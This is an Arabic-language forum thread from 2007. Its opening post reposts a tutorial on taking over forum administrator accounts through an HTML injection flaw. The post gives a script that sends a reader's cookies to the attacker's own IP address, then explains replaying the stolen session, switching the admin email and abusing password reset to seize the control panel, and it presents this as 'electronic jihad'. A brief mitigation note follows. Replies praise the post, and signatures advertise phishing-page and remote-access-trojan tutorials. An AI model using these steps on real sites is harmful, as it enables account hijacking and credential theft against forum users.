منتديات مدرسة المشاغبين  
دردشة وشات المشاغبين دردشة شات منوع شات خليجي
ماشاء الله تبارك الله ماشاء الله لاقوة الا بالله

العودة  »  منتديات مدرسة المشاغبين > ~¤ô¦¦§¦¦ô¤~ منتديات الكمبيوطر والانترنط ~¤ô¦¦§¦¦ô¤~ > الهكرز و الاختراق حماية فيروسات اختراق كراك hacker crack virus


للانف و الوجه عيادة بشار البزرة جراحة تجميل الانف و الوجه ينتهي في 19\12\1429 هـ

منتديات جسد اللقافة ينتهي في 15\2\1429 هـ 'منتدى لحظات لكل جديد ومفيد حيث المتعه والفائده ينتهي في 13\12\1429 هـ موقع احطك بعيوني ينتهي في 19\12\1429 هـ
عقارية المدينة ينتهي في 12\12\1429 هـ حراج سيارات شراء استبدال بيع جديدة و مستعملة جميع أنواع السيارات ينتهي في 12\5\1430 هـ موقع نهر الأنمي انتهاء في تاريخ 3-12-1429 هـ
مركز تحميل فلفة ينتهي في 16\12\1429 هـ 'للاعلان بالموقع 0\0\1429 هـ شبكة ورود الروح ينتهي في 16\12\1429 هـ


نعتذر عن حذف وايقاف اي عضو يستخدم بريد وهمي او غير صحيح او اسم غير لائق على ذلك جرى التنبيه
البعض يتسائل كيف يمكنني التسجيل و ماهي طريقة الحصول على عضوية بدون مشاكل الحل سهل جدا شرح كامل بالصور ( من هنا )

اختراق المنتديات عن طريق ثغرة Html


إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
  #1 (permalink)  
قديم 10-11-2007, 06:33 AM
صورة بنت الاما11كن
طالب ثانوي
 
تاريخ التسجيل: Oct 2007
البلد - المكان و السكن : بين طيات القهر
السيرة :
الهواية :
الوظيفة - العمل:
الجنس :
الجنسية :
موقع :
الجوال الموبايل :
مشاركات : 680
العمر :
منقول اختراق المنتديات عن طريق ثغرة Html



[align=center]

بسم الله الرحمن الرحيم
طبعا في البداية اخواني اقسم بالله العضيم ان لا استعمل هذه الطريقة ضد المنتيدات المسلمة بل ضد المنتديات الي تسيئ الى الاسلام

طرق اختراق المنتديات مجربه وفعاله

شرح الاختراق

الثغرة :
---------

تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..

قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
<******>document.write('<img
src="http://my_ip_address/'+document.******************************e+'">';</******>

مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :

GET/ bbuserid=86;%20bbpassword=dd61
69d68822a116cd97e1fb






ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f
8;%20bbthreadview[54






20]=1012444064;%20bblastvi
sit=1011983161

فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل][userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

------------
الحل
-----------

للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <******> فاذا وضعت <img> او <Demon> او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .

تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .


وهيه تعبتر من الجهاد الكتروني


من مواضيعي 0 للبنوتاااااات الكيووووووت ,,,,,,,,
0 اخترق اي اميل عن طريق الصفحة المزورة الطريقه التي يستعملها ملوك الهكر
0 اخترق اي اميل عن طريق الصفحة المزورة الطريقه التي يستعملها ملوك الهكر
0 الدروس المستفادة من اساليب الهكرز
0 كلمه تكتبها في قوقل يجيبلك كل الايميلات

منتديات فراشة حواء - للبنات للنساء للستات للحريم
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احدث الاغاني افضل الاناشيد اخر و احلى الالبومات
كتب اكترونية

دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس
  #2 (permalink)  
قديم 10-11-2007, 09:13 AM
صورة وطواط
مشرف منتدى الهكر والحمايه وفريق الدعم الفني للهكر
 
تاريخ التسجيل: Sep 2005
البلد - المكان و السكن : K.S.A
السيرة :
الهواية : الاختراق والحمايه
الوظيفة - العمل:
الجنس :
الجنسية :
موقع :
الجوال الموبايل :
مشاركات : 3,242
العمر :
رد: اختراق المنتديات عن طريق ثغرة Html

مشكوره اختي على الشرح المميز
اخوكم\\وطواط


من مواضيعي 0 ::.سبب ايقاف دورة مدرسة المشاغبين .::
0 wToOoAT..!..اقوى برنامج دمج باتش مع صوره او غيروه نادر..!..wToOoAT
0 {الدرس الثاني لاختراق الاجهزاه}شرح برنامج Bifrost البروسفت فيديو الجزء الثالث
0 {الدرس الثاني لاختراق الاجهزاه}شرح برنامج shl client فيديو الجزء الثاني
0 حل المشاكل الى في الدرس الثاني من وطواط الحقـ يابطل

منتديات فراشة حواء - للبنات للنساء للستات للحريم
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احدث الاغاني افضل الاناشيد اخر و احلى الالبومات
كتب اكترونية

دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس
  #3 (permalink)  
قديم 10-11-2007, 11:07 AM
موقوف من المشرف العام banned
 
تاريخ التسجيل: Aug 2007
البلد - المكان و السكن :
السيرة :
الهواية :
الوظيفة - العمل:
الجنس :
الجنسية :
موقع :
الجوال الموبايل :
مشاركات : 296
العمر :
رد: اختراق المنتديات عن طريق ثغرة Html

يعطيك العافية الشرح حلو وواضح

وإلى الامام



>>>>>>>>>>> مستلج الرياض


من مواضيعي 0 الحق نسختك .. > بيفروست معرب ومشفر ومنسق.. <
0 بضغطة زر حول الوندوز الى اصلي<< مستلج الرياض
0 "التحدث بروم اخر بعد أغلاق الثغره + كأنك تتكلم في الشات ونكك مخفي في قائمة النكات "
0 كيف تفك الباند بدون برنامج في ثواني

منتديات فراشة حواء - للبنات للنساء للستات للحريم
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احدث الاغاني افضل الاناشيد اخر و احلى الالبومات
كتب اكترونية

دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس
  #5 (permalink)  
قديم 10-11-2007, 08:34 PM
صورة بنت الاما11كن
طالب ثانوي
 
تاريخ التسجيل: Oct 2007
البلد - المكان و السكن : بين طيات القهر
السيرة :
الهواية :
الوظيفة - العمل:
الجنس :
الجنسية :
موقع :
الجوال الموبايل :
مشاركات : 680
العمر :
رد: اختراق المنتديات عن طريق ثغرة Html

وطواااااااط

يسلمووووووووووووووووو ع المرور منور الصفحه


مستلج الرياااااض

مشكوووووووووووور ع المرور منور صفحتى


من مواضيعي 0 للبنوتاااااات الكيووووووت ,,,,,,,,
0 اخترق اي اميل عن طريق الصفحة المزورة الطريقه التي يستعملها ملوك الهكر
0 اخترق اي اميل عن طريق الصفحة المزورة الطريقه التي يستعملها ملوك الهكر
0 الدروس المستفادة من اساليب الهكرز
0 كلمه تكتبها في قوقل يجيبلك كل الايميلات

منتديات فراشة حواء - للبنات للنساء للستات للحريم
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احدث الاغاني افضل الاناشيد اخر و احلى الالبومات
كتب اكترونية

دليل مواقع الفوركس والمتاجرة الالكترونية

رد مع اقتباس
إضافة رد على اختراق المنتديات عن طريق ثغرة Html

مواقع النشر


أدوات الموضوع
انواع عرض الموضوع



الساعة الآن 06:42 PM.


للإعلان بالموقع    |    اتصـل بنــا

Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd diamond


SEO by vBSEO 3.1.0